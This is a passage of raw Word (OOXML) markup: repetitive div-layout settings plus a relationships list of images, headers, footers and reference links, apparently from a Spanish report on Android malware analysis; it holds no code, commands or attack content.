                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1153061396">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1186865683">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="14693033">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1485779504">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1015613057">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="594021261">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="361252580">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="494343557">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="393048645">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="601844510">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="521281640">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1889536318">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="490097353">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1489596027">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="601883838">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="678387816">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1279988784">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1968732601">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1048071345">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="328101387">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1817607091">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="987515562">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="747072668">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="770055455">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="824855188">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1195075589">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="2010517919">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="749305501">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="2139567033">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="236789145">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="698506232">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1185709459">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="312106992">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1814180398">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1102187592">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="380206778">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="50353745">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="729960800">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="187841789">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1957785214">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1277760321">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1502351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570916">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1291741508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1666324301">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="191366349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hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signatures" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stuff.mit.edu/afs/sipb/project/android/docs/guide/topics/admin/device-admin.html" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seg-social.es/wps/portal/wss/internet/Trabajadores/CotizacionRecaudacionTrabajadores/36537" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://f-droid.org/es/" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.genymotion.com/" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/guide/topics/ui/notifiers/toasts" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://whois-history.whoisxmlapi.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ndss-symposium.org/wp-content/uploads/2018/03/NDSS2018_04A-4_Duan_Slides.pdf" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Guardsquare/proguard" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reactnative.dev/" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Glossary/UUID" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kaspersky.com/blog/malware-in-google-play-2023/49579/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyble.com/blog/chameleon-a-new-android-malware-spotted-in-the-wild/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.android-x86.org/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.incibe.es/sites/default/files/contenidos/guias/doc/guia_nacional_notificacion_gestion_ciberincidentes.pdf" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/torvalds/linux/blob/master/fs/eventpoll.c" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/studio/run/emulator-networking?hl=es-419" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 